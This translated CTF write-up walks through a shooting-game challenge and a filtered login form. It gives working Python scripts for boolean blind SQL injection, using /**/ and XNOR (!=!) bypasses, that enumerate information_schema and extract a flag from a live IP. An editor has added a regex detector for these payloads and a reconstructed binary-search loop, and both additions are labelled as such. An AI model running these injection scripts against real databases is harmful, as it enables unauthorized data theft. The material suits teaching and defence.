A shooting game. First, look at the source code:
In the source code there is a hint: once the score reaches 65 or more, the flag is handed out. A JS file is also referenced:
Open the JS file:
The flag is right there.
The input box carries a hint, "tarnish"! Try entering it:
Testing shows a filter is in place:
Comment characters are all filtered, so the injected string is closed off with a matching quote instead; spaces can be replaced with /**/.
The trick used here is XNOR!
XNOR is simply the inverse of XOR. Recall:
XOR: same -> 0, different -> 1
XNOR: same -> 1, different -> 0 (in MySQL, XNOR is written as !=!)
Test it locally first:
Try tarnish'!=!(1)!=!'1 -> this is equivalent to true!=!true!=!true, and the final result is true
The returned result looks like this:
Now try a case that evaluates to false -> tarnish'!=!(0)!=!'1, equivalent to true!=!false!=!true, final result false
After that a script is needed to carry out the blind injection:
import requests

url = 'http://1.14.71.254:28313/'
url_head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded"
}
# Candidate characters tried at each position of the result
url_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
content = ''
for i in range(1, 100):
    for s in url_str:
        # Earlier stages (commented out): enumerate databases, then tables, then columns
        #payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))={})/**/!=!'1".format(i,ord(s))
        #payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))={})/**/!=!'1".format(i,ord(s))
        #payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))={})/**/!=!'1".format(i,ord(s))
        # Final stage: read the flag column one character at a time
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))={})/**/!=!/**/'1".format(i, ord(s))
        url_data = {
            "username": payload
        }
        res = requests.post(url, headers=url_head, data=url_data)
        # "string(39)" in the response marks a true condition, i.e. the guessed character matched
        if "string(39)" in res.text:
            content += s
            print(content)
            break
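As an added example that is not part of the original writeup, here is a defender-side check for the shape of the bypass described above: /**/ standing in for spaces, the !=! chain, a quote break-out and a per-character ascii(mid(...)) oracle. The indicator names, the normalize/inspect_username helpers and the benign sample values are my own; the malicious samples are the writeup's probes and payloads.

```python
import re

# Heuristics for the filter bypass used in this challenge: comment markers and
# spaces were blocked, so the payload used /**/ as whitespace and chained !=!
# to build a boolean oracle. Indicator names are constructed for this example.
INDICATORS = {
    # /**/ standing in for a space
    "inline_comment_as_space": re.compile(r"/\*\*/"),
    # comparison against a negated sub-expression: the !=! chain
    "negated_comparison_chain": re.compile(r"!=\s*!"),
    # single quote directly followed by an operator: string context broken out of
    "quote_breakout": re.compile(r"'\s*(!=|=|<|>|\bor\b|\band\b)", re.I),
    # per-character oracle over a subquery result
    "char_oracle": re.compile(r"\bascii\s*\(\s*(mid|substr(ing)?)\s*\(", re.I),
    # schema enumeration stages of the same attack
    "schema_enumeration": re.compile(r"\binformation_schema\.", re.I),
}


def normalize(value):
    """Collapse inline comments to a space so operator patterns line up."""
    return re.sub(r"/\*.*?\*/", " ", value)


def inspect_username(value):
    """Return the indicator names matched by a submitted username.

    Both the raw value and its normalized form are searched, so the comment
    indicator fires on the raw text while operator indicators fire on the
    whitespace-restored text.
    """
    text = value + "\n" + normalize(value)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


# Constructed samples: the writeup's two probes, two of its payloads, and two
# benign usernames (one containing an apostrophe, which alone must not flag).
SAMPLES = {
    "probe_true": "tarnish'!=!(1)!=!'1",
    "probe_false": "tarnish'!=!(0)!=!'1",
    "enumerate_tables": "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),1,1))=102)/**/!=!'1",
    "extract_flag": "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),1,1))=102)/**/!=!/**/'1",
    "benign": "tarnish",
    "benign_quote": "o'neil",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:17s} -> {inspect_username(value) or 'clean'}")
```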
Below is the binary-search version of the script:
import requests

url = 'http://1.14.71.254:28953/'
url_head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded"
}
content = ''
for i in range(1, 100):
    # Search the printable ASCII range for the character at position i
    min_num = 32
    max_num = 126
    mid_num = (min_num + max_num) // 2
    while min_num < max_num:
        # The original writeup is cut off at this point; the loop body below is
        # reconstructed to mirror the linear script, asking "is the character
        # greater than mid_num?" instead of testing each candidate in turn.
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))>{})/**/!=!/**/'1".format(i, mid_num)
        res = requests.post(url, headers=url_head, data={"username": payload})
        if "string(39)" in res.text:
            min_num = mid_num + 1
        else:
            max_num = mid_num
        mid_num = (min_num + max_num) // 2
    content += chr(min_num)
    print(content)